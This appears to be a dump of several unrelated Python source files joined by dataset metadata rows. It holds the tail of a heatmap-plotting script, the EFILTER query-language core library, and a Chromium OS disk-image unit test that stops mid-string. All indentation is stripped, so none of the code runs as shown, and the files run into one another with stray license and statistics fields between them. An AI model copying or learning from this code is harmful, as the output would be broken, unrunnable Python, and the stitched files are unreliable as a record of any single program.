coords = db_worker_view.retrieve_all_links_coords()
x=[]
y=[]
page_lenghts = db_worker_view.retrieve_all_page_lengths()
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(page_lenghts[coord['source_article_id']])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
links_heatmap_hist, xedges, yedges = np.histogram2d(x, y, normed=True, bins=100)
links_extent = [xedges[0], xedges[-1], yedges[-1], yedges[0]]
coords = db_worker_view.retrieve_all_links_coords_clicks()
print 'coord loaded'
links = {}
x = []
y = []
values = []
for coord in coords:
        try:
            links[coord['key']] += 1
        except KeyError:
            links[coord['key']] = 0
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(coord['page_length'])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
if links[coord['key']]==0:
#x.append(x_normed)
#y.append(y_normed)
values.append(float(coord['counts']))
else:
values.append(float(coord['counts'])/float(links[coord['key']]))
clicks_heatmap_hist, xedges, yedges = np.histogram2d(x, y, bins=100, normed=True, weights=values)
clicks_extent = [xedges[0], xedges[-1], yedges[-1], yedges[0]]
substraction_hist = np.subtract(clicks_heatmap_hist,links_heatmap_hist)
#rel_prob_hist = np.divide(clicks_heatmap_hist, links_heatmap_hist)
with np.errstate(divide='ignore', invalid='ignore'):
rel_prob_hist = np.divide(clicks_heatmap_hist, links_heatmap_hist)
rel_prob_hist[rel_prob_hist == np.inf] = 0
rel_prob_hist = np.nan_to_num(rel_prob_hist)
fig_size = (2.4, 2)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(substraction_hist, extent=clicks_extent, origin='upper',norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
plt.show()
plt.savefig('output/clicks-links_heatmap_normed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(rel_prob_hist , extent=clicks_extent, origin='upper', norm=Normalize(),cmap=plt.get_cmap('jet'))
plt.colorbar()
plt.show()
plt.savefig('output/clicks_over_links_heatmap_normed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(substraction_hist, extent=clicks_extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
plt.show()
plt.savefig('output/clicks-links_heatmap_lognormed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(rel_prob_hist , extent=clicks_extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
plt.show()
plt.savefig('output/clicks_over_links_heatmap_lognormed_self_loop.pdf')
substraction_hist = np.subtract(links_heatmap_hist, clicks_heatmap_hist)
#rel_prob_hist = np.divide(clicks_heatmap_hist, links_heatmap_hist)
with np.errstate(divide='ignore', invalid='ignore'):
rel_prob_hist = np.divide(links_heatmap_hist, clicks_heatmap_hist)
rel_prob_hist[rel_prob_hist == np.inf] = 0
rel_prob_hist = np.nan_to_num(rel_prob_hist)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(substraction_hist, extent=clicks_extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links-clicks_heatmap_normed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(rel_prob_hist , extent=clicks_extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links_over_clicks_heatmap_normed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(substraction_hist, extent=clicks_extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links-clicks_heatmap_lognormed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(rel_prob_hist , extent=clicks_extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links_over_clicks_heatmap_lognormed_self_loop.pdf')
print "done"
if __name__ == '__main__':
links_heatmap()
clicks_heatmap_first_occ()
clicks_heatmap_total()
clicks_heatmap()
multiple_links_heatmap()
links_heatmap_rel_prob()
| mit | -2,729,897,635,614,966,000 | 29.158863 | 115 | 0.623177 | false |
google/dotty | efilter/stdlib/core.py | 1 | 10013 | # EFILTER Forensic Query Language
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
EFILTER stdlib - core module.
This module defines functions that are always included in every query, as well
as the base classes TypedFunction and LibraryModule, which are used to represent
stdlib functions and modules.
"""
__author__ = "Adam Sindelar <[email protected]>"
import itertools
import six
import threading
from efilter import protocol
from efilter.protocols import applicative
from efilter.protocols import counted
from efilter.protocols import reducer
from efilter.protocols import repeated
from efilter.protocols import structured
class TypedFunction(object):
"""Represents an EFILTER-callable function with reflection support.
Each function in the standard library is an instance of a subclass of
this class. Subclasses override __call__ and the reflection API.
"""
name = None
def apply(self, args, kwargs):
return self(*args, **kwargs)
def __call__(self):
raise NotImplementedError()
@classmethod
def reflect_static_args(cls):
return itertools.repeat(protocol.AnyType)
@classmethod
def reflect_static_return(cls):
return protocol.AnyType
applicative.IApplicative.implicit_dynamic(TypedFunction)
class TypedReducer(object):
"""Represents an EFILTER-callable reducer function.
TypedReducer supports the IReducer protocol, but also works as a function
(IApplicative), to allow it to reduce values inside rows in a query.
"""
name = None
# IApplicative
def apply(self, args, kwargs):
return self(*args, **kwargs)
def __call__(self, data, chunk_size=None):
return reducer.reduce(self, data, chunk_size)
@classmethod
def reflect_static_args(cls):
return (repeated.IRepeated,)
@classmethod
def reflect_static_return(cls):
return protocol.AnyType
# IReducer
def fold(self, chunk):
raise NotImplementedError()
def merge(self, left, right):
raise NotImplementedError()
def finalize(self, intermediate):
raise NotImplementedError()
applicative.IApplicative.implicit_dynamic(TypedReducer)
reducer.IReducer.implicit_dynamic(TypedReducer)
class SingletonReducer(object):
"""Preserves a literal value and ensures it's a singleton."""
name = "singleton"
def fold(self, chunk):
iterator = iter(chunk)
first = next(iterator)
for item in iterator:
if item != first:
raise ValueError("All values in a singleton reducer must be "
"equal to each other. Got %r != %r." % (
first, item))
return first
def merge(self, left, right):
if left != right:
raise ValueError("All values in a singleton reducer must be "
"equal to each other. Got %r != %r." % (
left, right))
return left
def finalize(self, intermediate):
return intermediate
class LibraryModule(object):
"""Represents a part of the standard library.
Each library module consists of a collection of vars, which are mostly
instances of TypedFunction. The stdcore module also contains basic types,
such as 'str' or 'int', in addition to functions.
"""
vars = None
name = None
# This is a class-level global storing all instances by their name.
ALL_MODULES = {}
_all_modules_lock = threading.Lock()
def __init__(self, vars, name):
self.vars = vars
self.name = name
self._all_modules_lock.acquire()
try:
if name in self.ALL_MODULES:
raise ValueError("Duplicate module name %r." % name)
self.ALL_MODULES[name] = self
finally:
self._all_modules_lock.release()
def __del__(self):
"""If modules are being used properly this will only happen on exit."""
self._all_modules_lock.acquire()
try:
del self.ALL_MODULES[self.name]
finally:
self._all_modules_lock.release()
def __repr__(self):
return "LibraryModule(name=%r, vars=%r)" % (self.name, self.vars)
def getmembers_runtime(self):
return self.vars.keys()
def resolve(self, name):
return self.vars[name]
def reflect_runtime_member(self, name):
return type(self.vars[name])
structured.IStructured.implicit_static(LibraryModule)
class First(TypedFunction):
"""Return the first value from an IRepeated."""
name = "first"
def __call__(self, x):
for value in repeated.getvalues(x):
return value
@classmethod
def reflect_static_args(cls):
return (repeated.IRepeated,)
@classmethod
def reflect_static_return(cls):
return protocol.AnyType
class Take(TypedFunction):
"""Take only the first 'count' elements from 'x' (tuple or IRepeated).
This implementation is lazy.
Example:
take(2, (1, 2, 3, 4)) -> (1, 2)
Arguments:
count: How many elements to return.
x: The tuple or IRepeated to take from.
Returns:
A lazy IRepeated.
"""
name = "take"
def __call__(self, count, x):
def _generator():
if isinstance(x, tuple):
values = x
else:
values = repeated.getvalues(x)
for idx, value in enumerate(values):
if idx == count:
break
yield value
return repeated.lazy(_generator)
@classmethod
def reflect_static_args(cls):
return (int, repeated.IRepeated)
@classmethod
def reflect_static_return(cls):
return repeated.IRepeated
class Drop(TypedFunction):
"""Drop the first 'count' elements from 'x' (tuple or IRepeated).
This implementation is lazy.
Example:
drop(2, (1, 2, 3, 4)) -> (3, 4)
Arguments:
count: How many elements to drop.
x: The tuple or IRepeated to drop from.
Returns:
A lazy IRepeated.
"""
name = "drop"
def __call__(self, count, x):
def _generator():
if isinstance(x, tuple):
values = x
else:
values = repeated.getvalues(x)
for idx, value in enumerate(values):
if idx < count:
continue
yield value
return repeated.lazy(_generator)
@classmethod
def reflect_static_args(cls):
return (int, repeated.IRepeated)
@classmethod
def reflect_static_return(cls):
return repeated.IRepeated
class Lower(TypedFunction):
"""Make a string lowercase."""
name = "lower"
def __call__(self, x):
return x.lower()
@classmethod
def reflect_static_args(cls):
return (six.string_types[0],)
@classmethod
def reflect_static_return(cls):
return six.string_types[0]
class Find(TypedFunction):
"""Returns the position of 'needle' in 'string', or -1 if not found."""
name = "find"
def __call__(self, string, needle):
return string.find(needle)
@classmethod
def reflect_static_args(cls):
return (six.string_types[0], six.string_types[0])
@classmethod
def reflect_static_return(cls):
return int
class Count(TypedReducer):
"""Counts the number of elements in a tuple or of values in a repeated."""
name = "count"
def fold(self, chunk):
return counted.count(chunk)
def merge(self, left, right):
return left + right
def finalize(self, intermediate):
return intermediate
@classmethod
def reflect_static_return(cls):
return int
class Reverse(TypedFunction):
"""Reverse a tuple of a repeated and maintains the type."""
name = "reverse"
def __call__(self, x):
if isinstance(x, tuple):
return tuple(reversed(x))
return repeated.meld(*reversed(repeated.getvalues(x)))
@classmethod
def reflect_static_args(cls):
return (repeated.IRepeated,)
@classmethod
def reflect_static_return(cls):
return repeated.IRepeated
class Materialize(TypedFunction):
"""Force a repeated value (e.g. output of map) to materialize in memory."""
name = "materialize"
def __call__(self, rv):
return repeated.repeated(*list(rv))
@classmethod
def reflect_static_args(cls):
return (repeated.IRepeated,)
@classmethod
def reflect_static_return(cls):
return repeated.IRepeated
MODULE = LibraryModule(name="stdcore",
vars={Take.name: Take(),
Drop.name: Drop(),
Count.name: Count(),
Reverse.name: Reverse(),
Lower.name: Lower(),
Find.name: Find(),
SingletonReducer.name: SingletonReducer(),
First.name: First(),
Materialize.name: Materialize(),
# Built-in types below:
"int": int,
"str": six.text_type,
"bytes": six.binary_type,
"float": float})
| apache-2.0 | 3,722,554,393,945,833,500 | 24.478372 | 80 | 0.602517 | false |
endlessm/chromium-browser | third_party/chromite/lib/image_lib_unittest.py | 1 | 25414 | # -*- coding: utf-8 -*-
# Copyright 2015 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Test the image_lib module."""
from __future__ import print_function
import collections
import gc
import glob
import os
import stat
import mock
from chromite.lib import cros_build_lib
from chromite.lib import cros_test_lib
from chromite.lib import git
from chromite.lib import image_lib
from chromite.lib import osutils
from chromite.lib import retry_util
from chromite.lib import partial_mock
# pylint: disable=protected-access
class FakeException(Exception):
"""Fake exception used for testing exception handling."""
FAKE_PATH = '/imaginary/file'
LOOP_DEV = '/dev/loop9999'
LOOP_PART_COUNT = 12
LOOP_PARTITION_INFO = [
image_lib.PartitionInfo(
1, 2928640, 2957311, 28672, 14680064, 'STATE', ''),
image_lib.PartitionInfo(
2, 20480, 53247, 32768, 16777216, 'KERN-A', ''),
image_lib.PartitionInfo(
3, 286720, 2928639, 2641920, 1352663040, 'ROOT-A', ''),
image_lib.PartitionInfo(
4, 53248, 86015, 32768, 16777216, 'KERN-B', ''),
image_lib.PartitionInfo(
5, 282624, 286719, 4096, 2097152, 'ROOT-B', ''),
image_lib.PartitionInfo(
6, 16448, 16448, 1, 512, 'KERN-C', ''),
image_lib.PartitionInfo(
7, 16449, 16449, 1, 512, 'ROOT-C', ''),
image_lib.PartitionInfo(
8, 86016, 118783, 32768, 16777216, 'OEM', ''),
image_lib.PartitionInfo(
9, 16450, 16450, 1, 512, 'reserved', ''),
image_lib.PartitionInfo(
10, 16451, 16451, 1, 512, 'reserved', ''),
image_lib.PartitionInfo(
11, 64, 16447, 16384, 8388608, 'RWFW', ''),
image_lib.PartitionInfo(
12, 249856, 282623, 32768, 16777216, 'EFI-SYSTEM', ''),
]
LOOP_PARTS_DICT = {
p.number: '%sp%d' % (LOOP_DEV, p.number) for p in LOOP_PARTITION_INFO}
LOOP_PARTS_LIST = LOOP_PARTS_DICT.values()
class LoopbackPartitionsMock(image_lib.LoopbackPartitions):
"""Mocked loopback partition class to use in unit tests."""
# pylint: disable=super-init-not-called
def __init__(self, path, destination=None, part_ids=None, mount_opts=None,
dev=LOOP_DEV, part_count=0):
"""Initialize.
Args:
(shared with LoopbackPartitions)
path: Path to the image file.
destination: destination directory.
part_ids: Mount these partitions at context manager entry.
mount_opts: Use these mount_opts for mounting |part_ids|.
(unique to LoopbackPartitionsMock)
dev: Path for the base loopback device.
part_count: How many partition device files to make up. Default: normal
partition table.
"""
self.path = path
self.dev = dev
self.part_ids = part_ids
self.mount_opts = mount_opts
if destination:
self.destination = destination
else:
self.destination = osutils.TempDir()
if part_count:
self._gpt_table = [
image_lib.PartitionInfo(num, 0, 0, 0, '', 'my-%d' % num, '')
for num in range(1, part_count + 1)]
else:
self._gpt_table = LOOP_PARTITION_INFO
self.parts = {p.number: '%sp%s' % (dev, p.number)
for p in self._gpt_table}
self.enable_rw_called = set()
self.disable_rw_called = set()
# pylint: enable=super-init-not-called
def EnableRwMount(self, part_id, offset=0):
"""Stub out enable rw mount."""
self.enable_rw_called.add((part_id, offset))
def DisableRwMount(self, part_id, offset=0):
"""Stub out disable rw mount."""
self.disable_rw_called.add((part_id, offset))
def _Mount(self, part, mount_opts):
"""Stub out mount operations."""
dest_number, _ = self._GetMountPointAndSymlink(part)
# Don't actually even try to mount it, let alone mark it mounted.
return dest_number
def _Unmount(self, part):
"""Stub out unmount operations."""
def close(self):
pass
class LoopbackPartitionsTest(cros_test_lib.MockTempDirTestCase):
"""Test the loopback partitions class"""
def setUp(self):
self.rc_mock = cros_test_lib.RunCommandMock()
self.StartPatcher(self.rc_mock)
self.rc_mock.SetDefaultCmdResult()
self.rc_mock.AddCmdResult(partial_mock.In('--show'), output=LOOP_DEV)
self.PatchObject(image_lib, 'GetImageDiskPartitionInfo',
return_value=LOOP_PARTITION_INFO)
self.PatchObject(glob, 'glob', return_value=LOOP_PARTS_LIST)
self.mount_mock = self.PatchObject(osutils, 'MountDir')
self.umount_mock = self.PatchObject(osutils, 'UmountDir')
self.retry_mock = self.PatchObject(retry_util, 'RetryException')
def fake_which(val, *_arg, **_kwargs):
return val
self.PatchObject(osutils, 'Which', side_effect=fake_which)
def testContextManager(self):
"""Test using the loopback class as a context manager."""
with image_lib.LoopbackPartitions(FAKE_PATH) as lb:
self.rc_mock.assertCommandContains(['losetup', '--show', '-f', FAKE_PATH])
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['partx', '-a', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV],
expected=False)
self.assertEqual(lb.parts, LOOP_PARTS_DICT)
self.assertEqual(lb._gpt_table, LOOP_PARTITION_INFO)
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV])
def testContextManagerWithMounts(self):
"""Test using the loopback class as a context manager with mounts."""
syml = self.PatchObject(osutils, 'SafeSymlink')
part_ids = (1, 'ROOT-A')
with image_lib.LoopbackPartitions(
FAKE_PATH, part_ids=part_ids, mount_opts=('ro',)) as lb:
expected_mounts = set()
expected_calls = []
for part_id in part_ids:
for part in LOOP_PARTITION_INFO:
if part.name == part_id or part.number == part_id:
expected_mounts.add(part)
expected_calls.append(
mock.call('dir-%d' % part.number, os.path.join(
lb.destination, 'dir-%s' % part.name)))
break
self.rc_mock.assertCommandContains(['losetup', '--show', '-f', FAKE_PATH])
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['partx', '-a', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV],
expected=False)
self.assertEqual(lb.parts, LOOP_PARTS_DICT)
self.assertEqual(lb._gpt_table, LOOP_PARTITION_INFO)
self.assertEqual(expected_calls, syml.call_args_list)
self.assertEqual(expected_mounts, lb._mounted)
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV])
def testManual(self):
"""Test using the loopback class closed manually."""
lb = image_lib.LoopbackPartitions(FAKE_PATH)
self.rc_mock.assertCommandContains(['losetup', '--show', '-f', FAKE_PATH])
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['partx', '-a', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV],
expected=False)
self.assertEqual(lb.parts, LOOP_PARTS_DICT)
self.assertEqual(lb._gpt_table, LOOP_PARTITION_INFO)
lb.close()
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV])
def gcFunc(self):
"""This function isolates a local variable so it'll be garbage collected."""
lb = image_lib.LoopbackPartitions(FAKE_PATH)
self.rc_mock.assertCommandContains(['losetup', '--show', '-f', FAKE_PATH])
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['partx', '-a', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV],
expected=False)
self.assertEqual(lb.parts, LOOP_PARTS_DICT)
self.assertEqual(lb._gpt_table, LOOP_PARTITION_INFO)
def testGarbageCollected(self):
"""Test using the loopback class closed by garbage collection."""
self.gcFunc()
# Force garbage collection in case python didn't already clean up the
# loopback object.
gc.collect()
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV])
def testMountUnmount(self):
"""Test Mount() and Unmount() entry points."""
lb = image_lib.LoopbackPartitions(FAKE_PATH, destination=self.tempdir)
# Mount four partitions.
lb.Mount((1, 3, 'ROOT-B', 'ROOT-C'))
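    # Part ids may be given as partition numbers or GPT labels; with the
    # canned table used here, (1, 3, 'ROOT-B', 'ROOT-C') resolves to
    # partition numbers 1, 3, 5 and 7.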
for p in (1, 3, 5, 7):
self.mount_mock.assert_any_call(
'%sp%d' % (LOOP_DEV, p), '%s/dir-%d' % (self.tempdir, p),
makedirs=True, skip_mtab=False, sudo=True, mount_opts=('ro',))
linkname = '%s/dir-%s' % (self.tempdir, LOOP_PARTITION_INFO[p - 1].name)
self.assertTrue(stat.S_ISLNK(os.lstat(linkname).st_mode))
self.assertEqual(4, self.mount_mock.call_count)
self.umount_mock.assert_not_called()
# Unmount half of them, confirm that they were unmounted.
lb.Unmount((1, 'ROOT-B'))
for p in (1, 5):
self.umount_mock.assert_any_call('%s/dir-%d' % (self.tempdir, p),
cleanup=False)
self.assertEqual(2, self.umount_mock.call_count)
self.umount_mock.reset_mock()
# Close the object, so that we unmount the other half of them.
lb.close()
for p in (3, 7):
self.umount_mock.assert_any_call('%s/dir-%d' % (self.tempdir, p),
cleanup=False)
self.assertEqual(2, self.umount_mock.call_count)
# Verify that the directories were cleaned up.
for p in (1, 3):
self.retry_mock.assert_any_call(
cros_build_lib.RunCommandError, 60, osutils.RmDir,
'%s/dir-%d' % (self.tempdir, p), sudo=True, sleep=1)
def testMountingMountedPartReturnsName(self):
"""Test that Mount returns the directory name even when already mounted."""
lb = image_lib.LoopbackPartitions(FAKE_PATH, destination=self.tempdir)
dirname = '%s/dir-%d' % (self.tempdir, lb._gpt_table[0].number)
# First make sure we get the directory name when we actually mount.
self.assertEqual(dirname, lb._Mount(lb._gpt_table[0], ('ro',)))
# Then make sure we get it when we call it again.
self.assertEqual(dirname, lb._Mount(lb._gpt_table[0], ('ro',)))
lb.close()
def testRemountCallsMount(self):
"""Test that Mount returns the directory name even when already mounted."""
lb = image_lib.LoopbackPartitions(FAKE_PATH, destination=self.tempdir)
devname = '%sp%d' % (LOOP_DEV, lb._gpt_table[0].number)
dirname = '%s/dir-%d' % (self.tempdir, lb._gpt_table[0].number)
# First make sure we get the directory name when we actually mount.
self.assertEqual(dirname, lb._Mount(lb._gpt_table[0], ('ro',)))
self.mount_mock.assert_called_once_with(
devname, dirname,
makedirs=True, skip_mtab=False, sudo=True, mount_opts=('ro',))
# Then make sure we get it when we call it again.
self.assertEqual(dirname, lb._Mount(lb._gpt_table[0], ('remount', 'rw')))
self.assertEqual(
mock.call(devname, dirname, makedirs=True, skip_mtab=False,
sudo=True, mount_opts=('remount', 'rw')),
self.mount_mock.call_args)
lb.close()
def testGetPartitionDevName(self):
"""Test GetPartitionDevName()."""
lb = image_lib.LoopbackPartitions(FAKE_PATH)
for part in LOOP_PARTITION_INFO:
self.assertEqual('%sp%d' % (LOOP_DEV, part.number),
lb.GetPartitionDevName(part.number))
if part.name != 'reserved':
self.assertEqual('%sp%d' % (LOOP_DEV, part.number),
lb.GetPartitionDevName(part.name))
lb.close()
def test_GetMountPointAndSymlink(self):
"""Test _GetMountPointAndSymlink()."""
lb = image_lib.LoopbackPartitions(FAKE_PATH, destination=self.tempdir)
for part in LOOP_PARTITION_INFO:
expected = [os.path.join(lb.destination, 'dir-%s' % n)
for n in (part.number, part.name)]
self.assertEqual(expected, list(lb._GetMountPointAndSymlink(part)))
lb.close()
def testIsExt2OnVarious(self):
"""Test _IsExt2 works with the various partition types."""
FS_PARTITIONS = (1, 3, 8)
# STATE, ROOT-A, and OEM generally have ext2 filesystems.
for x in FS_PARTITIONS:
self.rc_mock.AddCmdResult(
partial_mock.In('if=%sp%d' % (LOOP_DEV, x)),
output=b'\x53\xef')
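      # 0x53 0xEF is the ext2/3/4 superblock magic (0xEF53 little-endian),
      # which is what _IsExt2() is expected to find for these partitions.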
# Throw errors on all of the partitions that are < 1000 bytes.
for part in LOOP_PARTITION_INFO:
if part.size < 1000:
self.rc_mock.AddCmdResult(
partial_mock.In('if=%sp%d' % (LOOP_DEV, part.number)),
returncode=1, error='Seek failed\n')
lb = image_lib.LoopbackPartitions(FAKE_PATH, destination=self.tempdir)
# We expect that only the partitions in FS_PARTITIONS are ext2.
self.assertEqual(
[part.number in FS_PARTITIONS for part in LOOP_PARTITION_INFO],
[lb._IsExt2(part.name) for part in LOOP_PARTITION_INFO])
lb.close()
class LsbUtilsTest(cros_test_lib.MockTempDirTestCase):
"""Tests the various LSB utilities."""
def setUp(self):
# Patch os.getuid(..) to pretend running as root, so reading/writing the
# lsb-release file doesn't require escalated privileges and the test can
# clean itself up correctly.
self.PatchObject(os, 'getuid', return_value=0)
def testWriteLsbRelease(self):
"""Tests writing out the lsb_release file using WriteLsbRelease(..)."""
rc_mock = self.PatchObject(cros_build_lib, 'sudo_run')
fields = collections.OrderedDict((
('x', '1'), ('y', '2'), ('foo', 'bar'),
))
image_lib.WriteLsbRelease(self.tempdir, fields)
lsb_release_file = os.path.join(self.tempdir, 'etc', 'lsb-release')
expected_content = 'x=1\ny=2\nfoo=bar\n'
self.assertFileContents(lsb_release_file, expected_content)
rc_mock.assert_called_once_with([
'setfattr', '-n', 'security.selinux', '-v',
'u:object_r:cros_conf_file:s0',
os.path.join(self.tempdir, 'etc/lsb-release')])
# Test that WriteLsbRelease(..) correctly handles an existing file.
rc_mock = self.PatchObject(cros_build_lib, 'sudo_run')
fields = collections.OrderedDict((
('newkey1', 'value1'), ('newkey2', 'value2'), ('a', '3'), ('b', '4'),
))
image_lib.WriteLsbRelease(self.tempdir, fields)
expected_content = ('x=1\ny=2\nfoo=bar\nnewkey1=value1\nnewkey2=value2\n'
'a=3\nb=4\n')
self.assertFileContents(lsb_release_file, expected_content)
rc_mock.assert_called_once_with([
'setfattr', '-n', 'security.selinux', '-v',
'u:object_r:cros_conf_file:s0',
os.path.join(self.tempdir, 'etc/lsb-release')])
class BuildImagePathTest(cros_test_lib.MockTempDirTestCase):
"""BuildImagePath tests."""
def setUp(self):
self.board = 'board'
self.board_dir = os.path.join(self.tempdir, self.board)
D = cros_test_lib.Directory
filesystem = (
D(self.board, ('recovery_image.bin', 'other_image.bin')),
'full_path_image.bin',
)
cros_test_lib.CreateOnDiskHierarchy(self.tempdir, filesystem)
self.full_path = os.path.join(self.tempdir, 'full_path_image.bin')
def testBuildImagePath(self):
"""BuildImagePath tests."""
self.PatchObject(image_lib, 'GetLatestImageLink',
return_value=os.path.join(self.tempdir, self.board))
# Board and full image path provided.
result = image_lib.BuildImagePath(self.board, self.full_path)
self.assertEqual(self.full_path, result)
# Only full image path provided.
result = image_lib.BuildImagePath(None, self.full_path)
self.assertEqual(self.full_path, result)
# Full image path provided that does not exist.
with self.assertRaises(image_lib.ImageDoesNotExistError):
image_lib.BuildImagePath(self.board, '/does/not/exist')
with self.assertRaises(image_lib.ImageDoesNotExistError):
image_lib.BuildImagePath(None, '/does/not/exist')
# Default image is used.
result = image_lib.BuildImagePath(self.board, None)
self.assertEqual(os.path.join(self.board_dir, 'recovery_image.bin'), result)
# Image basename provided.
result = image_lib.BuildImagePath(self.board, 'other_image.bin')
self.assertEqual(os.path.join(self.board_dir, 'other_image.bin'), result)
# Image basename provided that does not exist.
with self.assertRaises(image_lib.ImageDoesNotExistError):
image_lib.BuildImagePath(self.board, 'does_not_exist.bin')
default_mock = self.PatchObject(cros_build_lib, 'GetDefaultBoard')
# Nothing provided, and no default.
default_mock.return_value = None
with self.assertRaises(image_lib.ImageDoesNotExistError):
image_lib.BuildImagePath(None, None)
# Nothing provided, with default.
default_mock.return_value = 'board'
result = image_lib.BuildImagePath(None, None)
self.assertEqual(os.path.join(self.board_dir, 'recovery_image.bin'), result)
class SecurityTestConfigTest(cros_test_lib.RunCommandTempDirTestCase):
"""SecurityTestConfig class tests."""
# pylint: disable=protected-access
def setUp(self):
self.image = '/path/to/image.bin'
self.baselines = '/path/to/baselines'
self.vboot_hash = 'abc123'
self.config = image_lib.SecurityTestConfig(self.image, self.baselines,
self.vboot_hash, self.tempdir)
def testVbootCheckout(self):
"""Test normal flow - clone and checkout."""
clone_patch = self.PatchObject(git, 'Clone')
self.config._VbootCheckout()
clone_patch.assert_called_once()
self.assertCommandContains(['git', 'checkout', self.vboot_hash])
# Make sure it doesn't try to clone & checkout again after already having
# done so successfully.
clone_patch = self.PatchObject(git, 'Clone')
self.config._VbootCheckout()
clone_patch.assert_not_called()
def testVbootCheckoutError(self):
"""Test exceptions in a git command."""
rce = cros_build_lib.RunCommandError('error')
self.PatchObject(git, 'Clone', side_effect=rce)
with self.assertRaises(image_lib.VbootCheckoutError):
self.config._VbootCheckout()
def testVbootCheckoutNoDirectory(self):
"""Test the error handling when the directory does not exist."""
# Test directory that does not exist.
self.config.directory = '/DOES/NOT/EXIST'
with self.assertRaises(image_lib.SecurityConfigDirectoryError):
self.config._VbootCheckout()
def testRunCheck(self):
"""RunCheck tests."""
# No config argument when running check.
self.config.RunCheck('check1', False)
check1 = os.path.join(self.config._checks_dir, 'ensure_check1.sh')
config1 = os.path.join(self.baselines, 'ensure_check1.config')
self.assertCommandContains([check1, self.image])
self.assertCommandContains([config1], expected=False)
# Include config argument when running check.
self.config.RunCheck('check2', True)
check2 = os.path.join(self.config._checks_dir, 'ensure_check2.sh')
config2 = os.path.join(self.baselines, 'ensure_check2.config')
self.assertCommandContains([check2, self.image, config2])
class GetImageDiskPartitionInfoTests(cros_test_lib.RunCommandTestCase):
"""Tests the GetImageDiskPartitionInfo function."""
SAMPLE_PARTED = """/foo/chromiumos_qemu_image.bin:\
2271240192B:file:512:512:gpt::;
11:32768B:8421375B:8388608B::RWFW:;
6:8421376B:8421887B:512B::KERN-C:;
7:8421888B:8422399B:512B::ROOT-C:;
9:8422400B:8422911B:512B::reserved:;
10:8422912B:8423423B:512B::reserved:;
2:10485760B:27262975B:16777216B::KERN-A:;
4:27262976B:44040191B:16777216B::KERN-B:;
8:44040192B:60817407B:16777216B:ext4:OEM:msftdata;
12:127926272B:161480703B:33554432B:fat16:EFI-SYSTEM:boot, esp;
5:161480704B:163577855B:2097152B::ROOT-B:;
3:163577856B:2260729855B:2097152000B:ext2:ROOT-A:;
1:2260729856B:2271215615B:10485760B:ext2:STATE:msftdata;
"""
SAMPLE_CGPT = """
start size part contents
0 1 PMBR (Boot GUID: 88FB7EB8-2B3F-B943-B933-\
EEC571FFB6E1)
1 1 Pri GPT header
2 32 Pri GPT table
1921024 2097152 1 Label: "STATE"
Type: Linux data
UUID: EEBD83BE-397E-BD44-878B-0DDDD5A5C510
20480 32768 2 Label: "KERN-A"
Type: ChromeOS kernel
UUID: 7007C2F3-08E5-AB40-A4BC-FF5B01F5460D
Attr: priority=15 tries=15 successful=1
1101824 819200 3 Label: "ROOT-A"
Type: ChromeOS rootfs
